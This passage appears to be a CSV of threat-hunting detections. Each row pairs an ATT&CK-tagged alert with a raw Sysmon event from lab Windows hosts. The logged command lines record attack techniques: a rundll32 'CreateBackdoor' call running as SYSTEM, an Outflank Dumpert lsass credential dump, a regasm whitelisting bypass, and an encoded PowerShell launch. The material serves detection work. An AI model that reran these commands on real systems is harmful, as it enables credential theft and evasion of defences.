<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.482</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-0010EE150C00</Data>
<Data Name=""ProcessId"">2372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-0020DE330100</Data>
<Data Name=""LogonId"">0x133de</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
</TimeCreated>
<EventRecordID>23</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
</TimeCreated>
<EventRecordID>9060</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
<Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
<Data Name=""SourceProcessId"">1532</Data>
<Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
<Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">1744</Data>
<Data Name=""StartAddress"">0x001A0000</Data>
<Data Name=""StartModule""></Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:34.411034Z"">
</TimeCreated>
<EventRecordID>4923</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:34.234</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-0010C2048900</Data>
<Data Name=""ProcessId"">1976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T12:35:55.876452Z"">
</TimeCreated>
<EventRecordID>244336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 12:35:55.872</Data>
<Data Name=""ProcessGuid"">747F3D96-0A2B-5E76-0000-0010C02A3D00</Data>
<Data Name=""ProcessId"">7072</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">net.exe</Data>
<Data Name=""CommandLine"">net start CDPSvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002043DE0200</Data>
<Data Name=""LogonId"">0x2de43</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-077C-5E76-0000-0010A5BA2300</Data>
<Data Name=""ParentProcessId"">5068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\InetSRV\appcmd.exe&quot; list vdir /text:physicalpath ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.000311Z"">
</TimeCreated>
<EventRecordID>5877</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:16.960</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6C-5CEB-0000-00107257FF00</Data>
<Data Name=""ProcessId"">3484</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\InetSRV\appcmd.exe&quot; list vdir /text:physicalpath</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
